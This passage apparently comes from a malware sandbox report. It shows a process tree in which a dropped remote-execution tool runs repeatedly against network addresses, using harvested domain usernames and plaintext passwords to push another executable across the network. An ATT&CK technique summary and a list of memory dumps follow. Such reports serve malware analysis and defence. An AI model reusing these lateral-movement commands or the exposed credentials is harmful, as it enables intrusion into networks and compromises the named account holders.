  2⤵
  - Executes dropped EXE
  PID:812
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1640
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1704
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:640
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1824
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2012
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1764
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:364
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1528
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1964
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1456
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:984
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1348
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1764
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1220
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1380
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1824
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1364
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1764
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:724
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:852
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1956
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1768
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1964
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1896
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1640
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1596
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "VQVVOAJK\Admin" -p "kjII5ENBL2U" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:724
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "VQVVOAJK\Admin" -p "kjII5ENBL2U" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "VQVVOAJK\Admin" -p "kjII5ENBL2U" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:968
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "VQVVOAJK\Admin" -p "kjII5ENBL2U" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1896
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "VQVVOAJK\Admin" -p "kjII5ENBL2U" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1504
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "VQVVOAJK\Admin" -p "kjII5ENBL2U" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1304
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1896
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1716
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1220
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\154.61.71.51 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1768
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:628
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1896
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:336
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\154.61.71.51 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1780
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1720
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1716
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:268
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:812
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:988
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:2028
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1580
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:972
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1468
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1320
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1040
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:876
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1568
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1708
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1632
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:240
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1756
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.0.1 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1528
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\154.61.71.51 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1384
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.0.1 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:876
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\154.61.71.51 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1580
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:2020
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1288
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1144
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1624
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1884
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1684
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:876
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1480

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1716

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:652

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Indicator Removal on Host

T1070

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/516-58-0x0000000010000000-0x00000000100AA000-memory.dmp

Filesize
680KB

Download
memory/952-54-0x0000000075AB1000-0x0000000075AB3000-memory.dmp

Filesize
8KB

Download
memory/1456-75-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp

Filesize
8KB

Download
memory/2016-65-0x0000000180000000-0x000000018002B000-memory.dmp

Filesize
172KB

Download